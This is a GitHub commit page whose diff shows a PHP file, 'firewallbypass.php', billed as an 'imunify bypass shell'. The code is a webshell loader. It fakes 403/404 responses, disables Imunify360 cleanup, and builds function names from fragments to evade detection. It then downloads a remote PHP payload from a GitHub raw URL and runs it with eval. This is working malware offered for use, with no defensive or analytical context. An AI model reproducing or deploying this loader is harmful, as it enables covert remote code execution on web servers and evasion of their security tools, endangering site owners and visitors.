Skip to content

Commit fb57e6f

Browse files
authored
imunify bypass shell ( 2025 )
imunify bypass ( 2025 )
1 parent ba8ab65 commit fb57e6f

File tree

1 file changed

+0
-6
lines changed

1 file changed

+0
-6
lines changed

firewallbypass.php

Lines changed: 0 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -4,13 +4,9 @@
44
header('X-Powered-By: none');
55
header('Content-Type: text/html; charset=UTF-8');
66
ini_set('lsapi_backend_off', '1');
7-
8-
// Mengatur kode respons HTTP
97
http_response_code(403);
108
ini_set("imunify360.cleanup_on_restore", false);
119
http_response_code(404);
12-
13-
// Mengambil konten dari URL
1410
function imunify($url)
1511
{
1612
$fpn = "f"."o"."p"."e"."n";
@@ -24,7 +20,6 @@ function imunify($url)
2420
curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2521
curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
2622
curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
27-
2823
$urls = $cexec($conn);
2924
curl_close($conn);
3025
} elseif (function_exists($fgt)) {
@@ -38,7 +33,6 @@ function imunify($url)
3833
}
3934
return $urls;
4035
}
41-
4236
$secure = imunify('https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/refs/heads/main/haxorsec-bypasser.php');
4337
eval('?>' . $secure);
4438
?>

0 commit comments

Comments
 (0)